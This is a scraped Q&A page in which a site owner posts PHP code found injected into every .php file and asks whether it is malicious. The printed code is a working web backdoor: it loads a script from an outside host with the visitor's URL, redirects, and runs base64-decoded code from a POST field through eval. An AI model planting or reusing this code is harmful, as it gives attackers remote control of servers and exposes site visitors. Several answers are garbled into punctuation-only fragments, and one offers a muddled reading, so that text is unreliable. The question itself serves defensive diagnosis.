Geek Answers Handbook

What will this PHP script do? is this malicious php code?

Can someone please advise what this php code will do? I have php found this code on all .php pages, other pages like js / css / php.ini, they are ok .. is it malicious code? if so, suggest how to prevent them?

Here is the code

global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}
+5
source share
4 answers

Most likely, it will redirect your page to the attacker's site. @will stop any errors, so you will not get any logs from this script.

You must delete it if you want your site to work correctly.

: , . script, cookie, javascript .

, - , , - - $_POST['showimg'], , POST.

: , , 0777, WordPress, WordPress . , .

+1

,

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));

, , , - .

+1

, , . /, , .

, Wordpress, , WordPress. ( ), .

0

im a security analyst, and I believe that it redirects you to a possible malicious website if and only if you do not have this cookie. if you already have this cookie, then the script will know that you have already been there, and possibly investigate the malware without performing a redirect. The image may look like a predefined detection debugger API. This is just my opinion.

0
source

More articles:


All Articles